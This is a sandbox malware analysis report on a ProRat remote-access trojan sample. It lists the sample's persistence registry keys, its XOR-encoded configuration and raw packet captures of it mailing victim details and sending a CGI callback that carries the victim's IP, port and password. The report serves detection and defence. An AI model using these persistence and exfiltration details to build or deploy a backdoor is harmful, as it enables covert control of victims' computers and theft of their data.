Analysis Date: 2018-03-15 13:11:00
MD5: ab5f65f34e9f15b12ecb4ed30efd3314
SHA1: 680d5182003be03edae7029c647eda10c8fc5535

Static Details:

File type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
PEhash

Runtime Details:


Process
↳ C:\Windows\System32\lsass.exe

Process
↳ C:\Users\Phil\AppData\Local\Temp\680d5182003be03edae7029c647eda10c8fc5535.exe

Creates File: C:\Windows\Globalization\Sorting\sortdefault.nls
Creates File: C:\Users\Phil\AppData\Local\Temp\680d5182003be03edae7029c647eda10c8fc5535.exe.bat
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings\Bulas ➝
1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings\FW_KILL ➝
0
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings\XP_FW_Disable ➝
0
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings\XP_SYS_Recovery ➝
0
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings\ICQ_UIN ➝
62/341/45/334
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings\ICQ_UIN2 ➝
046007686
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings\Kurban_Ismi ➝
whbuhl
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings\Mail ➝
sj`sddl53Ax`inn/bnl
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings\Online_List ➝
iuuq;..vvv/xntsrhud/bnl.bfh,cho.qsns`u/bfh
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings\Port ➝
4001
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings\Sifre ➝
032547
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings\Hata ➝
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings\KSil ➝
1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings\LanNotifie ➝
Note: several of the WinSettings values above appear to be stored with each character XORed with 0x01: decoded that way, Kurban_Ismi, Mail, Online_List, Port, Sifre and ICQ_UIN2 give the victim name, recipient address, CGI URL, port, password and friend_contact value that appear in clear text in the Raw Pcap section below.
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\DirectX For Microsoft® Windows ➝
C:\Windows\system32\fservice.exe
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}\StubPath ➝
C:\Windows\system\sservice.exe
Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
Explorer.exe C:\Windows\system32\fservice.exe

Process
↳ C:\Windows\SysWOW64\fservice.exe

Creates File: C:\Windows\Globalization\Sorting\sortdefault.nls

Process
↳ C:\Windows\services.exe

Creates File: C:\Windows\Globalization\Sorting\sortdefault.nls
Creates File: C:\Windows\System32\winkey.dll
Creates File: \Device\Afd\AsyncSelectHlp
Creates File: C:\Windows\System32\drivers\etc\protocol
Creates File: C:\Windows\System32\drivers\etc\protocol
Creates File: C:\Windows\System32\reginv.dll
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings\Tport ➝
0
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT Script Host\Microsoft DxDiag\WinSettings\ServerVersionInt ➝
19

Process
↳ C:\Windows\SysWOW64\cmd.exe

Creates File: C:\Users\Phil\AppData\Local\Temp\680d5182003be03edae7029c647eda10c8fc5535.exe.bat
Creates File: C:\Users\Phil\AppData\Local\Temp\680d5182003be03edae7029c647eda10c8fc5535.exe.bat
Creates File: C:\Users\Phil\AppData\Local\Temp\680d5182003be03edae7029c647eda10c8fc5535.exe.bat
Creates File: C:\Users\Phil\AppData\Local\Temp\680d5182003be03edae7029c647eda10c8fc5535.exe.bat
Creates File: C:\Users\Phil\AppData\Local\Temp\680d5182003be03edae7029c647eda10c8fc5535.exe.bat
Creates File: C:\Users\Phil\AppData\Local\Temp\680d5182003be03edae7029c647eda10c8fc5535.exe.bat

Network Details:


Raw Pcap
0x00000000 (00000)   47455420 2f6e6373 692e7478 74204854   GET /ncsi.txt HT
0x00000010 (00016)   54502f31 2e310d0a 436f6e6e 65637469   TP/1.1..Connecti
0x00000020 (00032)   6f6e3a20 436c6f73 650d0a55 7365722d   on: Close..User-
0x00000030 (00048)   4167656e 743a204d 6963726f 736f6674   Agent: Microsoft
0x00000040 (00064)   204e4353 490d0a48 6f73743a 20777777    NCSI..Host: www
0x00000050 (00080)   2e6d7366 746e6373 692e636f 6d0d0a0d   .msftncsi.com...
0x00000060 (00096)   0a                                    .

0x00000000 (00000)   48454c4f 2050726f 5261740d 0a4d4149   HELO ProRat..MAI
0x00000010 (00016)   4c204652 4f4d3a3c 50726f52 61744059   L FROM:<ProRat@Y
0x00000020 (00032)   61686f6f 2e436f6d 3e0d0a52 43505420   ahoo.Com>..RCPT 
0x00000030 (00048)   544f3a3c 726b6172 65656d34 32407961   TO:<rkareem42@ya
0x00000040 (00064)   686f6f2e 636f6d3e 0d0a4441 54410d0a   hoo.com>..DATA..
0x00000050 (00080)   46726f6d 3a202250 726f5261 74205631   From: "ProRat V1
0x00000060 (00096)   2e393a46 69782d31 3022203c 50726f52   .9:Fix-10" <ProR
0x00000070 (00112)   61744059 61686f6f 2e436f6d 3e0d0a54   at@Yahoo.Com>..T
0x00000080 (00128)   6f3a2072 6b617265 656d3432 40796168   o: rkareem42@yah
0x00000090 (00144)   6f6f2e63 6f6d0d0a 5375626a 6563743a   oo.com..Subject:
0x000000a0 (00160)   2050726f 52617420 5b766963 74696d20    ProRat [victim 
0x000000b0 (00176)   4f6e6c69 6e655d0d 0a53656e 6465723a   Online]..Sender:
0x000000c0 (00192)   204d6963 726f736f 6674204f 75746c6f    Microsoft Outlo
0x000000d0 (00208)   6f6b2045 78707265 73732036 2e30302e   ok Express 6.00.
0x000000e0 (00224)   32383030 2e313135 380d0a4d 696d652d   2800.1158..Mime-
0x000000f0 (00240)   56657273 696f6e3a 20312e30 0d0a436f   Version: 1.0..Co
0x00000100 (00256)   6e74656e 742d5479 70653a20 74657874   ntent-Type: text
0x00000110 (00272)   2f706c61 696e3b20 63686172 7365743d   /plain; charset=
0x00000120 (00288)   2255532d 41534349 49220d0a 44617465   "US-ASCII"..Date
0x00000130 (00304)   3a205468 752c2031 35204d61 72203230   : Thu, 15 Mar 20
0x00000140 (00320)   31382031 343a3434 3a303520 2d303030   18 14:44:05 -000
0x00000150 (00336)   300d0a0d 0a5b5072 6f526174 2056312e   0....[ProRat V1.
0x00000160 (00352)   393a4669 782d3130 5d0d0a56 69637469   9:Fix-10]..Victi
0x00000170 (00368)   6d206973 204f6e6c 696e652e 0d0a4950   m is Online...IP
0x00000180 (00384)   20416464 72657373 28657329 203a0d0a    Address(es) :..
0x00000190 (00400)   3139322e 3136382e 3130302e 3133360d   192.168.100.136.
0x000001a0 (00416)   0a0d0a50 6f727420 20202020 20202020   ...Port         
0x000001b0 (00432)   20203a35 3131300d 0a506173 73776f72     :5110..Passwor
0x000001c0 (00448)   64202020 20202020 3a313233 3435360d   d       :123456.
0x000001d0 (00464)   0a566963 74696d20 6e616d65 20202020   .Victim name    
0x000001e0 (00480)   3a766963 74696d0d 0a557365 72206e61   :victim..User na
0x000001f0 (00496)   6d652020 20202020 3a506869 6c0d0a43   me      :Phil..C
0x00000200 (00512)   6f6d7075 74657220 4e616d65 20203a50   omputer Name  :P
0x00000210 (00528)   48494c5f 50430d0a 44617465 20202020   HIL_PC..Date    
0x00000220 (00544)   20202020 2020203a 332f3135 2f323031          :3/15/201
0x00000230 (00560)   380d0a54 696d6520 20202020 20202020   8..Time         
0x00000240 (00576)   20203a32 3a34343a 30342050 4d0d0a2e     :2:44:04 PM...
0x00000250 (00592)   0d0a5155 49540d0a 51554954 0d0a       ..QUIT..QUIT..

0x00000000 (00000)   47455420 2f6e6373 692e7478 74204854   GET /ncsi.txt HT
0x00000010 (00016)   54502f31 2e310d0a 436f6e6e 65637469   TP/1.1..Connecti
0x00000020 (00032)   6f6e3a20 436c6f73 650d0a55 7365722d   on: Close..User-
0x00000030 (00048)   4167656e 743a204d 6963726f 736f6674   Agent: Microsoft
0x00000040 (00064)   204e4353 490d0a48 6f73743a 20777777    NCSI..Host: www
0x00000050 (00080)   2e6d7366 746e6373 692e636f 6d0d0a0d   .msftncsi.com...
0x00000060 (00096)   0a6b0d0a 33353420 456e6420 64617461   .k..354 End data
0x00000070 (00112)   20776974 68203c43 523e3c4c 463e2e3c    with <CR><LF>.<
0x00000080 (00128)   43523e3c 4c463e0d 0a323530 20322e36   CR><LF>..250 2.6
0x00000090 (00144)   2e30204f 6b3a2071 75657565 64206173   .0 Ok: queued as
0x000000a0 (00160)   20363135 36363632 420d0a32 32312032    6156662B..221 2
0x000000b0 (00176)   2e302e30 20636c6f 73696e67 20636f6e   .0.0 closing con
0x000000c0 (00192)   6e656374 696f6e2e 0d0a                nection...

0x00000000 (00000)   47455420 2f667269 656e6473 6869702f   GET /friendship/
0x00000010 (00016)   656d6169 6c5f7468 616e6b5f 796f752e   email_thank_you.
0x00000020 (00032)   7068703f 666f6c64 65725f69 643d3138   php?folder_id=18
0x00000030 (00048)   39383426 70617261 6d735f63 6f756e74   984&params_count
0x00000040 (00064)   3d30266e 69636b5f 6e616d65 3d50726f   =0&nick_name=Pro
0x00000050 (00080)   5f526174 26757365 725f656d 61696c3d   _Rat&user_email=
0x00000060 (00096)   50726f5f 52617440 7961686f 6f2e636f   Pro_Rat@yahoo.co
0x00000070 (00112)   6d267573 65725f75 696e3d26 66726965   m&user_uin=&frie
0x00000080 (00128)   6e645f6e 69636b6e 616d653d 26667269   nd_nickname=&fri
0x00000090 (00144)   656e645f 636f6e74 6163743d 31353731   end_contact=1571
0x000000a0 (00160)   31363739 37266672 69656e64 5f6e6963   16797&friend_nic
0x000000b0 (00176)   6b6e616d 65323d26 66726965 6e645f63   kname2=&friend_c
0x000000c0 (00192)   6f6e7461 6374323d 26783d36 3026793d   ontact2=&x=60&y=
0x000000d0 (00208)   31352048 5454502f 312e310d 0a416363   15 HTTP/1.1..Acc
0x000000e0 (00224)   6570743a 20696d61 67652f67 69662c20   ept: image/gif, 
0x000000f0 (00240)   696d6167 652f782d 78626974 6d61702c   image/x-xbitmap,
0x00000100 (00256)   20696d61 67652f6a 7065672c 20696d61    image/jpeg, ima
0x00000110 (00272)   67652f70 6a706567 2c206170 706c6963   ge/pjpeg, applic
0x00000120 (00288)   6174696f 6e2f782d 73686f63 6b776176   ation/x-shockwav
0x00000130 (00304)   652d666c 6173682c 202a2f2a 0d0a5265   e-flash, */*..Re
0x00000140 (00320)   66657265 723a2068 7474703a 2f2f7777   ferer: http://ww
0x00000150 (00336)   772e6963 712e636f 6d2f6672 69656e64   w.icq.com/friend
0x00000160 (00352)   73686970 2f706167 65732f73 656e645f   ship/pages/send_
0x00000170 (00368)   62795f65 6d61696c 5f313839 38342e70   by_email_18984.p
0x00000180 (00384)   68700d0a 41636365 70742d4c 616e6775   hp..Accept-Langu
0x00000190 (00400)   6167653a 20656e2d 75730d0a 41636365   age: en-us..Acce
0x000001a0 (00416)   70742d45 6e636f64 696e673a 20677a69   pt-Encoding: gzi
0x000001b0 (00432)   702c2064 65666c61 74650d0a 55736572   p, deflate..User
0x000001c0 (00448)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x000001d0 (00464)   342e3020 28636f6d 70617469 626c653b   4.0 (compatible;
0x000001e0 (00480)   204d5349 4520362e 303b2057 696e646f    MSIE 6.0; Windo
0x000001f0 (00496)   7773204e 5420352e 313b2053 5631290d   ws NT 5.1; SV1).
0x00000200 (00512)   0a486f73 743a2077 77772e69 63712e63   .Host: www.icq.c
0x00000210 (00528)   6f6d0d0a 436f6e6e 65637469 6f6e3a20   om..Connection: 
0x00000220 (00544)   4b656570 2d416c69 76650d0a 436f6f6b   Keep-Alive..Cook
0x00000230 (00560)   69653a20 67656f3d 3335393b 20616473   ie: geo=359; ads
0x00000240 (00576)   506f7075 70303d31 30393832 33323939   Popup0=109823299
0x00000250 (00592)   30313033 0d0a0d0a                     0103....

0x00000000 (00000)   504f5354 202f3365 31363236 34372d63   POST /3e162647-c
0x00000010 (00016)   3364382d 34346333 2d393937 622d3061   3d8-44c3-997b-0a
0x00000020 (00032)   63396135 66363838 33322f20 48545450   c9a5f68832/ HTTP
0x00000030 (00048)   2f312e31 0d0a4361 6368652d 436f6e74   /1.1..Cache-Cont
0x00000040 (00064)   726f6c3a 206e6f2d 63616368 650d0a43   rol: no-cache..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2043 6c6f7365   onnection: Close
0x00000060 (00096)   0d0a5072 61676d61 3a206e6f 2d636163   ..Pragma: no-cac
0x00000070 (00112)   68650d0a 436f6e74 656e742d 54797065   he..Content-Type
0x00000080 (00128)   3a206170 706c6963 6174696f 6e2f736f   : application/so
0x00000090 (00144)   61702b78 6d6c0d0a 55736572 2d416765   ap+xml..User-Age
0x000000a0 (00160)   6e743a20 57534441 50490d0a 436f6e74   nt: WSDAPI..Cont
0x000000b0 (00176)   656e742d 4c656e67 74683a20 3733330d   ent-Length: 733.
0x000000c0 (00192)   0a486f73 743a2031 39322e31 36382e31   .Host: 192.168.1
0x000000d0 (00208)   30302e31 33363a35 3335370d 0a0d0a3c   00.136:5357....<
0x000000e0 (00224)   3f786d6c 20766572 73696f6e 3d22312e   ?xml version="1.
0x000000f0 (00240)   30222065 6e636f64 696e673d 22757466   0" encoding="utf
0x00000100 (00256)   2d38223f 3e3c736f 61703a45 6e76656c   -8"?><soap:Envel
0x00000110 (00272)   6f706520 786d6c6e 733a736f 61703d22   ope xmlns:soap="
0x00000120 (00288)   68747470 3a2f2f77 77772e77 332e6f72   http://www.w3.or
0x00000130 (00304)   672f3230 30332f30 352f736f 61702d65   g/2003/05/soap-e
0x00000140 (00320)   6e76656c 6f706522 20786d6c 6e733a77   nvelope" xmlns:w
0x00000150 (00336)   73613d22 68747470 3a2f2f73 6368656d   sa="http://schem
0x00000160 (00352)   61732e78 6d6c736f 61702e6f 72672f77   as.xmlsoap.org/w
0x00000170 (00368)   732f3230 30342f30 382f6164 64726573   s/2004/08/addres
0x00000180 (00384)   73696e67 2220786d 6c6e733a 6c6d733d   sing" xmlns:lms=
0x00000190 (00400)   22687474 703a2f2f 73636865 6d61732e   "http://schemas.
0x000001a0 (00416)   6d696372 6f736f66 742e636f 6d2f7769   microsoft.com/wi
0x000001b0 (00432)   6e646f77 732f6c6d 732f3230 30372f30   ndows/lms/2007/0
0x000001c0 (00448)   38223e3c 736f6170 3a486561 6465723e   8"><soap:Header>
0x000001d0 (00464)   3c777361 3a546f3e 75726e3a 75756964   <wsa:To>urn:uuid
0x000001e0 (00480)   3a336531 36323634 372d6333 64382d34   :3e162647-c3d8-4
0x000001f0 (00496)   3463332d 39393762 2d306163 39613566   4c3-997b-0ac9a5f
0x00000200 (00512)   36383833 323c2f77 73613a54 6f3e3c77   68832</wsa:To><w
0x00000210 (00528)   73613a41 6374696f 6e3e6874 74703a2f   sa:Action>http:/
0x00000220 (00544)   2f736368 656d6173 2e786d6c 736f6170   /schemas.xmlsoap
0x00000230 (00560)   2e6f7267 2f77732f 32303034 2f30392f   .org/ws/2004/09/
0x00000240 (00576)   7472616e 73666572 2f476574 3c2f7773   transfer/Get</ws
0x00000250 (00592)   613a4163 74696f6e 3e3c7773 613a4d65   a:Action><wsa:Me
0x00000260 (00608)   73736167 6549443e 75726e3a 75756964   ssageID>urn:uuid
0x00000270 (00624)   3a613164 65333766 332d3833 65612d34   :a1de37f3-83ea-4
0x00000280 (00640)   3062642d 61306632 2d653766 38303136   0bd-a0f2-e7f8016
0x00000290 (00656)   37633462 333c2f77 73613a4d 65737361   7c4b3</wsa:Messa
0x000002a0 (00672)   67654944 3e3c7773 613a5265 706c7954   geID><wsa:ReplyT
0x000002b0 (00688)   6f3e3c77 73613a41 64647265 73733e68   o><wsa:Address>h
0x000002c0 (00704)   7474703a 2f2f7363 68656d61 732e786d   ttp://schemas.xm
0x000002d0 (00720)   6c736f61 702e6f72 672f7773 2f323030   lsoap.org/ws/200
0x000002e0 (00736)   342f3038 2f616464 72657373 696e672f   4/08/addressing/
0x000002f0 (00752)   726f6c65 2f616e6f 6e796d6f 75733c2f   role/anonymous</
0x00000300 (00768)   7773613a 41646472 6573733e 3c2f7773   wsa:Address></ws
0x00000310 (00784)   613a5265 706c7954 6f3e3c77 73613a46   a:ReplyTo><wsa:F
0x00000320 (00800)   726f6d3e 3c777361 3a416464 72657373   rom><wsa:Address
0x00000330 (00816)   3e75726e 3a757569 643a3061 61343666   >urn:uuid:0aa46f
0x00000340 (00832)   62362d64 3465642d 34353335 2d393263   b6-d4ed-4535-92c
0x00000350 (00848)   622d3630 30333835 36666438 63393c2f   b-6003856fd8c9</
0x00000360 (00864)   7773613a 41646472 6573733e 3c2f7773   wsa:Address></ws
0x00000370 (00880)   613a4672 6f6d3e3c 6c6d733a 4c617267   a:From><lms:Larg
0x00000380 (00896)   654d6574 61646174 61537570 706f7274   eMetadataSupport
0x00000390 (00912)   2f3e3c2f 736f6170 3a486561 6465723e   /></soap:Header>
0x000003a0 (00928)   3c736f61 703a426f 64792f3e 3c2f736f   <soap:Body/></so
0x000003b0 (00944)   61703a45 6e76656c 6f70653e            ap:Envelope>

0x00000000 (00000)   47455420 68747470 3a2f2f77 77772e79   GET http://www.y
0x00000010 (00016)   6f757273 6974652e 636f6d2f 6367692d   oursite.com/cgi-
0x00000020 (00032)   62696e2f 70726f72 61742e63 67693f62   bin/prorat.cgi?b
0x00000030 (00048)   696c6769 73617961 72616469 3d504849   ilgisayaradi=PHI
0x00000040 (00064)   4c5f5043 26697061 64726573 693d3139   L_PC&ipadresi=19
0x00000050 (00080)   322e3136 382e3130 302e3133 36267365   2.168.100.136&se
0x00000060 (00096)   72766572 706f7274 753d3531 3130266b   rverportu=5110&k
0x00000070 (00112)   75726261 6e3d7669 6374696d 26736572   urban=victim&ser
0x00000080 (00128)   7665726d 6f64656c 693d5631 2e393a46   vermodeli=V1.9:F
0x00000090 (00144)   69782d31 30267365 72766572 73616174   ix-10&serversaat
0x000000a0 (00160)   693d323a 34343a30 345f504d 26736572   i=2:44:04_PM&ser
0x000000b0 (00176)   76657274 61726968 693d332f 31352f32   vertarihi=3/15/2
0x000000c0 (00192)   30313826 73657276 65727369 6672653d   018&serversifre=
0x000000d0 (00208)   31323334 35362669 736c656d 3d6c6f67   123456&islem=log
0x000000e0 (00224)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x000000f0 (00240)   743a2069 6d616765 2f676966 2c20696d   t: image/gif, im
0x00000100 (00256)   6167652f 782d7862 69746d61 702c2069   age/x-xbitmap, i
0x00000110 (00272)   6d616765 2f6a7065 672c2069 6d616765   mage/jpeg, image
0x00000120 (00288)   2f706a70 65672c20 2a2f2a0d 0a416363   /pjpeg, */*..Acc
0x00000130 (00304)   6570742d 4c616e67 75616765 3a20656e   ept-Language: en
0x00000140 (00320)   2d75730d 0a416363 6570742d 456e636f   -us..Accept-Enco
0x00000150 (00336)   64696e67 3a20677a 69702c20 6465666c   ding: gzip, defl
0x00000160 (00352)   6174650d 0a557365 722d4167 656e743a   ate..User-Agent:
0x00000170 (00368)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000180 (00384)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000190 (00400)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x000001a0 (00416)   2e31290d 0a486f73 743a2077 77772e79   .1)..Host: www.y
0x000001b0 (00432)   6f757273 6974652e 636f6d0d 0a436f6e   oursite.com..Con
0x000001c0 (00448)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x000001d0 (00464)   6976650d 0a0d0a                       ive....

0x00000000 (00000)   504f5354 202f3365 31363236 34372d63   POST /3e162647-c
0x00000010 (00016)   3364382d 34346333 2d393937 622d3061   3d8-44c3-997b-0a
0x00000020 (00032)   63396135 66363838 33322f20 48545450   c9a5f68832/ HTTP
0x00000030 (00048)   2f312e31 0d0a4361 6368652d 436f6e74   /1.1..Cache-Cont
0x00000040 (00064)   726f6c3a 206e6f2d 63616368 650d0a43   rol: no-cache..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2043 6c6f7365   onnection: Close
0x00000060 (00096)   0d0a5072 61676d61 3a206e6f 2d636163   ..Pragma: no-cac
0x00000070 (00112)   68650d0a 436f6e74 656e742d 54797065   he..Content-Type
0x00000080 (00128)   3a206170 706c6963 6174696f 6e2f736f   : application/so
0x00000090 (00144)   61702b78 6d6c0d0a 55736572 2d416765   ap+xml..User-Age
0x000000a0 (00160)   6e743a20 57534441 50490d0a 436f6e74   nt: WSDAPI..Cont
0x000000b0 (00176)   656e742d 4c656e67 74683a20 3733330d   ent-Length: 733.
0x000000c0 (00192)   0a486f73 743a2031 39322e31 36382e31   .Host: 192.168.1
0x000000d0 (00208)   30302e31 37303a35 3335370d 0a0d0a3c   00.170:5357....<
0x000000e0 (00224)   3f786d6c 20766572 73696f6e 3d22312e   ?xml version="1.
0x000000f0 (00240)   30222065 6e636f64 696e673d 22757466   0" encoding="utf
0x00000100 (00256)   2d38223f 3e3c736f 61703a45 6e76656c   -8"?><soap:Envel
0x00000110 (00272)   6f706520 786d6c6e 733a736f 61703d22   ope xmlns:soap="
0x00000120 (00288)   68747470 3a2f2f77 77772e77 332e6f72   http://www.w3.or
0x00000130 (00304)   672f3230 30332f30 352f736f 61702d65   g/2003/05/soap-e
0x00000140 (00320)   6e76656c 6f706522 20786d6c 6e733a77   nvelope" xmlns:w
0x00000150 (00336)   73613d22 68747470 3a2f2f73 6368656d   sa="http://schem
0x00000160 (00352)   61732e78 6d6c736f 61702e6f 72672f77   as.xmlsoap.org/w
0x00000170 (00368)   732f3230 30342f30 382f6164 64726573   s/2004/08/addres
0x00000180 (00384)   73696e67 2220786d 6c6e733a 6c6d733d   sing" xmlns:lms=
0x00000190 (00400)   22687474 703a2f2f 73636865 6d61732e   "http://schemas.
0x000001a0 (00416)   6d696372 6f736f66 742e636f 6d2f7769   microsoft.com/wi
0x000001b0 (00432)   6e646f77 732f6c6d 732f3230 30372f30   ndows/lms/2007/0
0x000001c0 (00448)   38223e3c 736f6170 3a486561 6465723e   8"><soap:Header>
0x000001d0 (00464)   3c777361 3a546f3e 75726e3a 75756964   <wsa:To>urn:uuid
0x000001e0 (00480)   3a336531 36323634 372d6333 64382d34   :3e162647-c3d8-4
0x000001f0 (00496)   3463332d 39393762 2d306163 39613566   4c3-997b-0ac9a5f
0x00000200 (00512)   36383833 323c2f77 73613a54 6f3e3c77   68832</wsa:To><w
0x00000210 (00528)   73613a41 6374696f 6e3e6874 74703a2f   sa:Action>http:/
0x00000220 (00544)   2f736368 656d6173 2e786d6c 736f6170   /schemas.xmlsoap
0x00000230 (00560)   2e6f7267 2f77732f 32303034 2f30392f   .org/ws/2004/09/
0x00000240 (00576)   7472616e 73666572 2f476574 3c2f7773   transfer/Get</ws
0x00000250 (00592)   613a4163 74696f6e 3e3c7773 613a4d65   a:Action><wsa:Me
0x00000260 (00608)   73736167 6549443e 75726e3a 75756964   ssageID>urn:uuid
0x00000270 (00624)   3a316230 31376264 332d3032 38632d34   :1b017bd3-028c-4
0x00000280 (00640)   3533662d 61363462 2d633330 39393739   53f-a64b-c309979
0x00000290 (00656)   33343965 393c2f77 73613a4d 65737361   349e9</wsa:Messa
0x000002a0 (00672)   67654944 3e3c7773 613a5265 706c7954   geID><wsa:ReplyT
0x000002b0 (00688)   6f3e3c77 73613a41 64647265 73733e68   o><wsa:Address>h
0x000002c0 (00704)   7474703a 2f2f7363 68656d61 732e786d   ttp://schemas.xm
0x000002d0 (00720)   6c736f61 702e6f72 672f7773 2f323030   lsoap.org/ws/200
0x000002e0 (00736)   342f3038 2f616464 72657373 696e672f   4/08/addressing/
0x000002f0 (00752)   726f6c65 2f616e6f 6e796d6f 75733c2f   role/anonymous</
0x00000300 (00768)   7773613a 41646472 6573733e 3c2f7773   wsa:Address></ws
0x00000310 (00784)   613a5265 706c7954 6f3e3c77 73613a46   a:ReplyTo><wsa:F
0x00000320 (00800)   726f6d3e 3c777361 3a416464 72657373   rom><wsa:Address
0x00000330 (00816)   3e75726e 3a757569 643a6637 30393763   >urn:uuid:f7097c
0x00000340 (00832)   30382d33 3665642d 34653461 2d396565   08-36ed-4e4a-9ee
0x00000350 (00848)   612d6462 62323862 36343039 62613c2f   a-dbb28b6409ba</
0x00000360 (00864)   7773613a 41646472 6573733e 3c2f7773   wsa:Address></ws
0x00000370 (00880)   613a4672 6f6d3e3c 6c6d733a 4c617267   a:From><lms:Larg
0x00000380 (00896)   654d6574 61646174 61537570 706f7274   eMetadataSupport
0x00000390 (00912)   2f3e3c2f 736f6170 3a486561 6465723e   /></soap:Header>
0x000003a0 (00928)   3c736f61 703a426f 64792f3e 3c2f736f   <soap:Body/></so
0x000003b0 (00944)   61703a45 6e76656c 6f70653e            ap:Envelope>

0x00000000 (00000)   504f5354 202f3365 31363236 34372d63   POST /3e162647-c
0x00000010 (00016)   3364382d 34346333 2d393937 622d3061   3d8-44c3-997b-0a
0x00000020 (00032)   63396135 66363838 33322f20 48545450   c9a5f68832/ HTTP
0x00000030 (00048)   2f312e31 0d0a4361 6368652d 436f6e74   /1.1..Cache-Cont
0x00000040 (00064)   726f6c3a 206e6f2d 63616368 650d0a43   rol: no-cache..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2043 6c6f7365   onnection: Close
0x00000060 (00096)   0d0a5072 61676d61 3a206e6f 2d636163   ..Pragma: no-cac
0x00000070 (00112)   68650d0a 436f6e74 656e742d 54797065   he..Content-Type
0x00000080 (00128)   3a206170 706c6963 6174696f 6e2f736f   : application/so
0x00000090 (00144)   61702b78 6d6c0d0a 55736572 2d416765   ap+xml..User-Age
0x000000a0 (00160)   6e743a20 57534441 50490d0a 436f6e74   nt: WSDAPI..Cont
0x000000b0 (00176)   656e742d 4c656e67 74683a20 3733330d   ent-Length: 733.
0x000000c0 (00192)   0a486f73 743a2031 39322e31 36382e31   .Host: 192.168.1
0x000000d0 (00208)   30302e31 38363a35 3335370d 0a0d0a3c   00.186:5357....<
0x000000e0 (00224)   3f786d6c 20766572 73696f6e 3d22312e   ?xml version="1.
0x000000f0 (00240)   30222065 6e636f64 696e673d 22757466   0" encoding="utf
0x00000100 (00256)   2d38223f 3e3c736f 61703a45 6e76656c   -8"?><soap:Envel
0x00000110 (00272)   6f706520 786d6c6e 733a736f 61703d22   ope xmlns:soap="
0x00000120 (00288)   68747470 3a2f2f77 77772e77 332e6f72   http://www.w3.or
0x00000130 (00304)   672f3230 30332f30 352f736f 61702d65   g/2003/05/soap-e
0x00000140 (00320)   6e76656c 6f706522 20786d6c 6e733a77   nvelope" xmlns:w
0x00000150 (00336)   73613d22 68747470 3a2f2f73 6368656d   sa="http://schem
0x00000160 (00352)   61732e78 6d6c736f 61702e6f 72672f77   as.xmlsoap.org/w
0x00000170 (00368)   732f3230 30342f30 382f6164 64726573   s/2004/08/addres
0x00000180 (00384)   73696e67 2220786d 6c6e733a 6c6d733d   sing" xmlns:lms=
0x00000190 (00400)   22687474 703a2f2f 73636865 6d61732e   "http://schemas.
0x000001a0 (00416)   6d696372 6f736f66 742e636f 6d2f7769   microsoft.com/wi
0x000001b0 (00432)   6e646f77 732f6c6d 732f3230 30372f30   ndows/lms/2007/0
0x000001c0 (00448)   38223e3c 736f6170 3a486561 6465723e   8"><soap:Header>
0x000001d0 (00464)   3c777361 3a546f3e 75726e3a 75756964   <wsa:To>urn:uuid
0x000001e0 (00480)   3a336531 36323634 372d6333 64382d34   :3e162647-c3d8-4
0x000001f0 (00496)   3463332d 39393762 2d306163 39613566   4c3-997b-0ac9a5f
0x00000200 (00512)   36383833 323c2f77 73613a54 6f3e3c77   68832</wsa:To><w
0x00000210 (00528)   73613a41 6374696f 6e3e6874 74703a2f   sa:Action>http:/
0x00000220 (00544)   2f736368 656d6173 2e786d6c 736f6170   /schemas.xmlsoap
0x00000230 (00560)   2e6f7267 2f77732f 32303034 2f30392f   .org/ws/2004/09/
0x00000240 (00576)   7472616e 73666572 2f476574 3c2f7773   transfer/Get</ws
0x00000250 (00592)   613a4163 74696f6e 3e3c7773 613a4d65   a:Action><wsa:Me
0x00000260 (00608)   73736167 6549443e 75726e3a 75756964   ssageID>urn:uuid
0x00000270 (00624)   3a363931 38353364 392d3361 33622d34   :691853d9-3a3b-4
0x00000280 (00640)   3935302d 39333566 2d623035 66333561   950-935f-b05f35a
0x00000290 (00656)   61366666 643c2f77 73613a4d 65737361   a6ffd</wsa:Messa
0x000002a0 (00672)   67654944 3e3c7773 613a5265 706c7954   geID><wsa:ReplyT
